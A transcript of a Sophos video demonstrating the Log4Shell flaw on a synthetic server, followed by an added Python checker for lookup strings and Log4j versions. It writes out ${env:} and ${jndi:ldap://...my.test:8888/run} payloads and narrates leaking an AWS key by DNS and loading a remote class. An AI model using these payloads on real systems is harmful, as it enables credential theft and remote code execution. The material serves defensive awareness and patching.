Log4Shell: The Movie... Why your sysadmins are working into the holidays

Captions
Hello everybody, I am Paul Ducklin from Sophos Naked Security, and my goal now is to convince you that if you have not yet upgraded to Log4j 2.17, or whatever the current version is at the time you see this video, you really should. So let's kick straight off.

What I'm going to do: I want you to imagine that this server, although it's got my face on it, is your server. You have a service on here that accepts requests from a web server, maybe one of your web servers, that allows people to put in phone numbers. Those phone numbers are uploaded to a server running on your service and logged using Java Log4j. So here's the synthetic program that I created. Whoops, I'm in the wrong directory, so let's just get there. So let's run that up.

So what I'm going to do is I am going to run a service that is listening for requests from outside. So this is you, with the vulnerable server, slash service. This is me, the bad guy, on a server outside, that will upload a phone number to you. And somewhere inside your network you're going to collect that number. It might be collected on a web server that doesn't use Java, that isn't vulnerable, and it's going to be passed off somewhere in your network to a server that does have a vulnerable Log4j. Here's what can go wrong.

So just to show you what happens when I click the button: I've sent the request to your server, your server has processed it. It's received a URL which has the phone number in it, as a form submission, as a GET request. It's extracted the phone number from it, and the synthetic logging that I'm doing here is that I have called out to a vulnerable Java program, and it is using the Log4j library here. So the time, that's inserted by Log4j; that's the function that was called; I'm logging it as an error because they get logged by default; that's the Java class that was running; and that is the message that I wanted to log. Could be out of memory, could be network problems, or it could be data that you want to log that came in from outside, and in this case it's exactly the data you see here.

So let's try that again. Let's log something else. So if I don't put in a phone number but I submit, say, "hello". Fire up the server on the vulnerable computer, and you'll see once again the server accepts the connection. The server isn't vulnerable, but it's passed off to the logger, and the logger returns the value that I put in. So that all seems pretty innocent. You're logging data from outside; that's quite normal, for auditing or for compliance reasons, and you're logging external data. Now in this case it's a phone number. It could be an HTTP User-Agent string, it could be a credit card number, it could be an expiry date, it could be a name, it could be an address. Anything that you're logging that comes from outside can't be trusted, and so logging text like "hello" seems innocent enough.

The problem is that Log4j has a sort of meta-language, almost a programming language of its own, that allows text in the data to be logged to control, or to reprogram, the logger. That sounds like a terribly bad idea, and it turns out that it is. For example, if I pretend that my phone number is ${java:os}: anything inside the dollar-squiggly-bracket, squiggly-bracket is essentially a meta-command, a program that, when it's logged at the other end inside your network, the Log4j code will take that string and rewrite it. So instead of logging exactly what you see there, let's look at what happens. So I'll submit that, fire up the server, and you should see that what gets logged in this case is not the data that I put in there, which was actually that funny-looking string; it was actually converted inside the server to a string of that sort. Now that seems perfectly innocent. It seems bad enough to me, because it means that you're not logging what the user actually submitted, if that was your goal, say, for auditing purposes. But at least it seems innocent that you've got a dud log entry that has some weird data, where the external user decided what was going to be put in your log file and you couldn't control it.

Now it gets slightly worse, because the programming language, if you like, that Log4j supports even lets you read in-memory stuff like environment variables. So if I put in ${env: and then I put, say, USERNAME, which is an environment variable on Windows that has the currently logged-in user (you can imagine on a server that would be the account that the server is using), then when that gets logged you'll see that when the server accepts the data coming in from outside and chooses to log it, instead of logging what you see there, ${env:USERNAME}, it's actually converted to a memory-based server string. Again, that may seem pretty innocent, but it can get even worse, because, for example, if you use Amazon Web Services you may have an environment variable in your system called something like that: AWS_ACCESS_KEY_ID. So if I'm a malevolent user and I pretend to you that my phone number is that funny string, and you happen to have one of those secret access keys in memory, in the program environment on your server, in memory so that you carefully don't write it to disk, then what happens when I click OK and it reaches your computer (this is a fake one from Amazon's website, so don't panic) is that you've now ended up logging something that was only supposed to be in memory. So that's a sort of best of the worst.

But actually there's even more that you can do with this magic programming system. If you put in a string that looks like this, ${jndi:, and in this case I'm going to follow that with ldap, it's a well-known directory protocol (there are lots of different protocols supported by this JNDI system: RMI, DNS and others; there's a great article on Sophos News that digs into the code to analyse the bugs, if you're interested go and have a look at that). Whoops, I want 8888, and then I'm going to put something like run there. So here's another program that I can put. So if I try and log a phone number that looks like this, believe it or not, what this instructs a vulnerable, misconfigured system to do is it says to the other end: the stuff that's in the dollar-squiggly-brackets, this string here that I'm choosing because I'm outside, I get to say to you, look up that server name via DNS. So no TCP connections yet: see if you can find that server by asking your corporate DNS, can you look this up? And of course I control my.test, so my DNS server, which we see over here, is what's going to handle that request from your corporate network to try and locate this server in the first place. And although your server may be blocked from making TCP connections, it may be allowed to do DNS lookups. So you'll see that what will happen now is that it will try and look up that server. If that server exists, it will then instruct your server: make a connection to TCP port 8888 on it, try and talk the LDAP protocol, and tell it that you're interested in a thing called run.

So let's look what happens when we try and submit that. Here we go: fire up the server, accept the request. You'll see that what we should be logging is indeed... that little flash; I put a little flash in my server so you can see when something interesting happens. So we didn't get much activity, it seems, and it did actually log the string that I submitted, as suspicious as it is. But I, from outside, sending in that string, did manage to force your server to do a DNS lookup via your corporate network to my DNS server. So I now know you're at least partially vulnerable, because I chose that name there and I can see that echoed in my DNS data, and that means I sent a request, you logged it, and while logging it you did the lookup. So that's pretty bad so far.

In fact, you can see that even if nothing else happens, because there's no port 8888, there's no LDAP happening, I, as the controller of this DNS server, if I wanted... imagine that instead of calling the server "try me" in my domain, let's say that I said, you know what, use that AWS access key, pretend that's the server name instead, and imagine that I said, well, what I want to do is I want to force you to look up a server called <your access key>.my.test. What do you think will happen now? Well, let's have a look. When I click Submit you'll see the request is processed, the DNS request goes out, and indeed your server, via your corporate network, by doing nothing more than a DNS lookup, has just leaked in plain text, probably onto the internet and to my malevolent DNS server: I've got a copy of your AWS access key ID, which is very bad indeed.

But let's see if we can take it one step further. The problem here is that there's nothing running on port 8888, but of course my.test, that's my domain, so I'm going to actually fire up a server here that is listening on port 8888. So I'm going to run an LDAP server. Let's try one more time. So here we go. Now I'm going to do the access again; let's just change this string so that it's obvious if we get something. I pressed Enter, never mind, let's not do that. You'll see that now I actually did get two flashes of activity. I got the DNS lookup, there it is a second time, and then I did get the LDAP lookup, because I was busy listening, and your server, your vulnerable Log4j, spoke to my LDAP server. It said, hello, I'd like to log in, and of course I'm the bad guy, I said go on then, you don't need a password to reach my server, and in I came, and you said, I want an object called run, which you see is the string I put there. So that's a second thing that I've put into your network and has leaked out again; that string matches the thing that you've looked for. And what my server's done is say, hey, by the way, I haven't got that object for you; what you need to do is go and download it via HTTP from this particular URL here, which of course I've said I want to put on my server. So let's try again and see what happens.

This time I'm going to run a web server on port 8887. So I've now got DNS, should see you coming; then LDAP should capture your request for whatever it is that I want you to get; and my HTTP server should actually say, here it is, and what I'm going to send you is a Java class file, in the hope that you'll run it. So let's try that now. So if I just do this exactly again, this time what I will do is I'm going to change that so we can see it more easily; that can just be, we'll call it hello this time. So let's try that again. Your server is now listening, I'm going to send in the request (remember, I'm outside), so here we go. In comes the request, your logger processes it, you get a DNS lookup for the hello site that I wanted, you got the LDAP connection, and again I said please redirect, and you can see here you obliged: when you redirected, my web server got your request. Now I don't have a Java class file for this run object, so I just said that I was a teapot and gave you a 418 error, and we didn't go any further. I've still got the data leakage here, I've still got the data leakage here, but I haven't actually injected any code.

So let's try once more with this, and this time what I'm going to do is I'm going to ask for an object via the LDAP server, but I know I do have a Java program to send you. And I could send you anything: I could send you a keylogger, I could send you a network sniffer, a coin miner, you name it. What I'm going to do, just to keep it simple and because this is a demonstration, I'm going to try and pop a calculator. So I'm going to send you a Java program, which is the compiled .class form of this file. All it does is say, please run a calculator. I only like the best sorts of calculators, so it has to be an RPN one; I'm not going to load regular calc.exe. But if we see a calc pop up you will know that this has been foisted upon you from outside by my server over here. In other words, basically, if this works, because of the vulnerable Log4j you've been pwned. And remember that I'm popping a calculator, but I'm doing it with Java code that I chose. I could put absolutely anything I want in there: ransomware, coin mining, opening back doors. In fact, one of the coin miners we've already seen the crooks using also opens up a root back door: it drops a key for the crooks and it enables root login, so that if you have SSH for your own administration, they can actually log in as root to look after their coin miner and do whatever else they want.

So let's see if that's going to work. So, like I said, this time I'm going to be asking for something that I know I have, the "run this" .class file, the source code you saw. I'll put in some spaces here so we can see the new requests coming in, if they do. Let's see what happens this time. So now I'll click OK. The service responded: I've got the DNS request, followed by the LDAP request that said where to go next this time, followed by an HTTP request that actually serves back the malicious class file, and that program did indeed pop a calculator on your server. This time it was only a calculator; it could in theory have been almost anything running on the server, inside the Java process that's doing the logging, with all the authority and network access that that Java process has. So it could download more malware if it wanted. So hopefully that convinces you: you really want to do something about this.

The good news is that the reason this has been working here is that I have deliberately been using the old version of Log4j. So I set my Java class path (that's the environment variable; it's often set that way, but you can also set it on the command line or in a configuration file; each application will have a class path set which says which add-ons do I want to use, so you'll typically be saying, well, I'm using Log4j and a load of other stuff, and you'll say which versions you want to use). Now it just so happens that I have included here the more recent versions, so I've got 2.17 of the needed files. If you have the real distribution, it has lots and lots of different JAR files; they'd all be in one directory. So what I'm going to do is let me just actually change my class path for the next invocation of this, and let's change that to be Log4j 2.17 of the API one and 2.17 of core; those are the two components I use. More complicated logging might use more parts of the Log4j toolkit. The important thing is the 2.17.0. Let us fire up that server again, and although this is a sample size of one, let's put in some spaces again. What I'm going to do is I'm going to repeat exactly the same requests, and you should see that with the patch in place the log happens. Did you see, it was much quicker, because it didn't have to go out and try and download a load of stuff. There was no DNS lookup, there was no LDAP request, there was no HTTP download, so there was no data leaked, there was no LDAP connection, and there was no malware implant.

And I hope, folks, that that lets you know that really what you want is Log4j 2.17.0. If you upgraded already to 2.15.0, don't panic; there are a couple more bugs that were found in this, and 2.15 was quickly followed by 2.16, quickly followed by 2.17. If you're halfway through upgrading to 2.15, don't go back to the beginning and start again with 2.17; finish the ones that aren't patched, then go back and upgrade the 2.15 to 2.17. Because, as you can see, anything you have that is below 2.15 could put you at serious risk: via DNS, via a wide range of TCP protocols including LDAP, which is the one that all the cool kids seem to be using, and then finally by an HTTP download that could foist any malware the crooks want. So thanks for listening, everybody, I hope you enjoyed this, and until next time, stay secure.
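As an added example (my own code, not from the video or from Sophos), here is a small Python check for the two things the demo turns on: the ${prefix:...} lookup strings in data you are about to log, resolved innermost-first the way Log4j does so that an ${env:...} nested inside a ${jndi:...} hostname (the DNS leak in the demo) is visible, and the log4j-core version on a classpath compared with the 2.15.0 and 2.17.0 thresholds the video gives. The phone-number strings and the classpath are constructed samples.

```python
import re

# Innermost Log4j 2 lookup, e.g. ${java:os} or ${env:USERNAME}: a prefix, a colon,
# then an argument that contains no further ${...}. Nested lookups are resolved
# innermost-first, which is how ${jndi:ldap://${env:X}.my.test/...} leaks X via DNS.
INNERMOST = re.compile(r"\$\{([A-Za-z]+):([^${}]*)\}")

def find_lookups(value):
    """Return (prefix, argument) pairs in resolution order. Each resolved lookup is
    replaced by <prefix> so an enclosing lookup shows where the value would land."""
    found = []
    while True:
        m = INNERMOST.search(value)
        if not m:
            return found
        prefix = m.group(1).lower()
        found.append((prefix, m.group(2)))
        value = value[:m.start()] + "<" + prefix + ">" + value[m.end():]

def risk_of(value):
    """Worst case for a value about to be logged: 'remote-load' (jndi: DNS lookup,
    LDAP connection, class download), 'disclosure' (env:), 'rewrite' or None."""
    lookups = find_lookups(value)
    prefixes = {p for p, _ in lookups}
    if "jndi" in prefixes:
        return "remote-load"
    if "env" in prefixes:
        return "disclosure"
    return "rewrite" if lookups else None

VERSION_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

def classpath_status(classpath, sep=":"):
    """Map each log4j-core JAR on a classpath (sep is ';' on Windows) to
    'vulnerable' (< 2.15.0), 'upgrade' (2.15.x/2.16.x) or 'ok' (>= 2.17.0)."""
    status = {}
    for entry in classpath.split(sep):
        m = VERSION_RE.search(entry)
        if m:
            ver = tuple(int(x) for x in m.groups())
            status[entry] = ("vulnerable" if ver < (2, 15, 0)
                             else "upgrade" if ver < (2, 17, 0) else "ok")
    return status

if __name__ == "__main__":
    # Constructed samples mirroring the demo's submissions and classpath.
    for phone in ["0123456789", "${java:os}", "${env:AWS_ACCESS_KEY_ID}",
                  "${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.my.test:8888/run}"]:
        print(repr(phone), "->", risk_of(phone), find_lookups(phone))
    print(classpath_status("lib/log4j-api-2.14.1.jar:lib/log4j-core-2.14.1.jar"))
```

The version check only tells you what the classpath says; an application that bundles Log4j inside its own JAR or WAR still needs to be inspected separately.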
Info
Channel: Naked Security
Views: 2,295
Keywords: cybersecurity, CVE-2021-44228, hacking, Log4j
Id: jSs6bjmv6ak
Length: 18min 18sec (1098 seconds)
Published: Mon Dec 20 2021